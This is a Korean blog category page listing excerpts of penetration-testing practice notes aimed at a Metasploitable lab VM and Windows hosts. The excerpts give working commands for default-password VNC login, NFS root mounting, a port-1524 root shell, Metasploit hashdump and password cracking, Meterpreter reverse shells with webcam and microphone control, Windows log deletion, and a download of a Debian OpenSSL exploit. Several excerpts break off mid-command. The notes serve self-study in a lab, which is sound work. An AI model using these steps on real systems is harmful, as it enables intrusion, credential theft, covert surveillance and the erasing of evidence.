목록Kali Linux/Metasploitable (15)
Self-Improvement
*에러 내용 *해결법 web모듈을 다운받아서 압축푼 경로에서 "python setup.py install"
*정의 상대 서버에는 VNC서버가 구동중이며 약한 암호로 설정이 되어있으며 암호는 “password“이다. 이를 통해서 로그인 및 서비스 제어를 할 수 있어 인증되지 않은 공격자에 의해 악용될 수 있습니다.DNS 프로토콜에 Cache Poisoning 취약점이 존재하며 이 취약점을 이용하여 공격자는 취약한 DNS를 사용하는 시스템에 공격자는 조작된 DNS 쿼리를 다량으로 전달하여 DNS 캐쉬서버의 내용을 임의로 변경할 수 있다 Victim : metasploitable *확인 root@kali:~# dig @192.168.10.134 +short porttest.dns-oarc.net TXT 취약한 경우 : POOR, 취약하지 않은 경우 : Great, GOOD
*정의 상대 서버에는 VNC서버가 구동중이며 약한 암호로 설정이 되어있으며 암호는 “password“이다. 이를 통해서 로그인 및 서비스 제어를 할 수 있어 인증되지 않은 공격자에 의해 악용될 수 있습니다. Attacker : kali Victim : metasploitable *실습 (kali) root@kali:~# nmap -sV -p 5900 192.168.10.134 r oot@kali:~# vncviewer 192.168.10.134 패스워드 : password로 하였더니 성공하였다.
*정의 상대 서버의 NFS 공유 자원에 모든 호스트들이 접근 가능하며 마운트를 수행하여 파일을 읽고 쓰기를 할 수가 있는 취약점이다. Attacker : kali Victim : metasploitable *실습 (kali) root@kali:~# nmap -sV -p 2049 192.168.10.134 root@kali:~# showmount -e 192.168.10.134 모든 호스트가 접근이 가능하다. root@kali:~# mount 192.168.10.134:/ /nfsmount root@kali:~# df -h | grep 192.168.10.134 root@kali:~# ls /nfsmount/ 상대 서버가 공유 경로를 /(루트)로 하였음으로 하위 폴더, 파일에 접근 가능함으로 취약하다.
*정의 공격자는 원격포트를 통해 인증없이 연결하고 명령어을 직접 전송하여 사용 할 수 있다. Attacker : kali Victim : metasploitable *실습 (kali) root@kali:~# nmap -sV -p 1524 192.168.10.134 root@kali:~# telnet 192.168.10.134 1524 암호입력없이 root권한으로 연결이 되어진다.
*세션을 이용한 post/hashdump(패스워드 크랙) 실습 Attacker : kali Victim : metasploitable ※Victim에 여러 취약점 공격을 통하여 Session이 연결되어 있어야함 (kali) msf > sessions msf > use post/linux/gather/hashdump msf > show options msf > set session 1 msf > show options msf > exploit msf > exit -y #john /root/.msf4/loot/20180105141842_default_192.168.10.134_linux.hashes_958442.txt 툴을 이용하여 해당 파일의 암호를 크랙을 하면 된다.
*웹캠제어 노트북에 장착이 되어 있는 웹캠 디바이스를 칼리 리눅스에서 제어해 보자. 사용하는 명령어는 다음과 같다. webcam_list 설치돼 있는 웹캠의 정보를 가져온다. webcam_start 목록에서 도출된 웹캠을 선택해서 시작한다. webcam_get_frame 사진의 프레임 값을 정한다. 화질을 지정할 때 사용한다. webcam_stop 웹캠의 실행을 중지한다. webcat_audio_record 웹캠 마이크를 사용해 녹음을 지원한다. ex) 핸드폰, 감시카메라 등 Attacker : kali Victim : 한성노트북 ※ 앞서 진행했던 reverse_tcp가 선행되어야 함 *실습 (kali) #msfconsole -q msf > use exploit/multi/handler msf > set..
*윈도우 2008 로그 삭제 Attacker : Kali Victim : Windows 2008 R2 사전에 Widows 2008 R2에 침입이 가능하다는 전제가 필요하다. *실습 (kali) #cd /root/bin #vi reverse_resource2.rc use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.20.50 set ExitSession false exploit -j -z ※msfconsole의 -r옵션인 리소스로 사용하기위해 사전 생성 #msfconsole -r reverse_resource2.rc (해당 터미널은 있고 새로운 터미널로 진행) #msfvenom -p window..
*meterpreter를 이용한 Reverse_TCP 공격 bind_TCP : 타겟이 공인IP로 되어있는 경우에(서버) Attacker가 해당 타겟에 붙는 것 reverse_TCP : 타겟이 사설IP로 되어있는 경우에(PC) Attacker가 항상 구동중인 상태의 서버로 타겟이 Attacker에 붙는 것 Attacker : Kali Victim : Windows 7 ※메터프리터는 상대 OS별로 사용할 수 있는 명령어를 제공 한다. *msfvenom msfvenom은 Metasploit의 페이로드를 파일 형식으로 만들어줌 *실습 (kali) #mkdir -p /root/bin #cd /root/bin #vi reverse_resource.rc (msfconsole의 리소스 형식으로 할 예정) use exp..
*Debian OpenSSL Predictable PRNG Brute Force SSH Attacker : Kali Victim : Metasploitable cve-2008-0166 Dabian 기반의 OS에 OpenSSL 0.9.8c-1 ~ 0.9.8g-9 버전까지 가능하며 예측가능한 숫자들을 가지고 Brute Force 하는 것 *실습 (kali) #mkdir -p /root/bin && cd /root/bin #wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 #tar jxvf 5622.tar.bz2 (Public와 상응하는 Private을 만들어냄) ex..